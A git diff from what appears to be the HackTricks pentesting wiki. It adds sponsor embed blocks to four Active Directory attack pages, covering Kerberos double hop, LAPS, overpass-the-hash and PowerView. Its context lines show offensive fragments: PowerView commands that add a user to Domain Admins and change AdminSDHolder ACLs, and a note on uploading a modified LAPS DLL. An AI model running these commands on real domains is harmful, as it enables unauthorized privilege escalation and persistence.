Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md b/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md index 8374c1138..1b6d96219 100644 --- a/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md +++ b/windows-hardening/active-directory-methodology/kerberos-double-hop-problem.md @@ -12,6 +12,11 @@
+
+ +{% embed url="https://websec.nl/" %} + + ## Introduction The Kerberos "Double Hop" problem appears when an attacker attempts to use **Kerberos authentication across two** **hops**, for example using **PowerShell**/**WinRM**. @@ -110,6 +115,10 @@ icacls.exe "C:\Users\redsuit\Documents\ssh\OpenSSH-Win64" /grant Everyone:RX /T * [https://learn.microsoft.com/en-gb/archive/blogs/sergey\_babkins\_blog/another-solution-to-multi-hop-powershell-remoting](https://learn.microsoft.com/en-gb/archive/blogs/sergey\_babkins\_blog/another-solution-to-multi-hop-powershell-remoting) * [https://4sysops.com/archives/solve-the-powershell-multi-hop-problem-without-using-credssp/](https://4sysops.com/archives/solve-the-powershell-multi-hop-problem-without-using-credssp/) +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/windows-hardening/active-directory-methodology/laps.md b/windows-hardening/active-directory-methodology/laps.md index e8eed6922..e1c532be6 100644 --- a/windows-hardening/active-directory-methodology/laps.md +++ b/windows-hardening/active-directory-methodology/laps.md @@ -12,6 +12,11 @@
+
+ +{% embed url="https://websec.nl/" %} + + ## Basic Information Local Administrator Password Solution (LAPS) is a tool used for managing a system where **administrator passwords**, which are **unique, randomized, and frequently changed**, are applied to domain-joined computers. These passwords are stored securely within Active Directory and are only accessible to users who have been granted permission through Access Control Lists (ACLs). The security of the password transmissions from the client to the server is ensured by the use of **Kerberos version 5** and **Advanced Encryption Standard (AES)**. @@ -134,6 +139,10 @@ Then, just compile the new `AdmPwd.PS.dll` and upload it to the machine in `C:\T ## References * [https://4sysops.com/archives/introduction-to-microsoft-laps-local-administrator-password-solution/](https://4sysops.com/archives/introduction-to-microsoft-laps-local-administrator-password-solution/) +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md b/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md index 519472ee5..76e88832c 100644 --- a/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md +++ b/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md @@ -12,6 +12,11 @@
+
+ +{% embed url="https://websec.nl/" %} + + ## Overpass The Hash/Pass The Key (PTK) The **Overpass The Hash/Pass The Key (PTK)** attack is designed for environments where the traditional NTLM protocol is restricted, and Kerberos authentication takes precedence. This attack leverages the NTLM hash or AES keys of a user to solicit Kerberos tickets, enabling unauthorized access to resources within a network. @@ -49,6 +54,10 @@ To conform to operational security and use AES256, the following command can be * [https://www.tarlogic.com/es/blog/como-atacar-kerberos/](https://www.tarlogic.com/es/blog/como-atacar-kerberos/) +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! diff --git a/windows-hardening/basic-powershell-for-pentesters/powerview.md b/windows-hardening/basic-powershell-for-pentesters/powerview.md index 572221a65..9d3304f0d 100644 --- a/windows-hardening/basic-powershell-for-pentesters/powerview.md +++ b/windows-hardening/basic-powershell-for-pentesters/powerview.md @@ -12,6 +12,11 @@
+
+ +{% embed url="https://websec.nl/" %} + + The most up-to-date version of PowerView will always be in the dev branch of PowerSploit: [https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) [**SharpView**](https://github.com/tevora-threat/SharpView) is a .NET port of [**PowerView**](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1) @@ -342,6 +347,11 @@ Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=lo Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain.local ``` + +
+ +{% embed url="https://websec.nl/" %} +
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!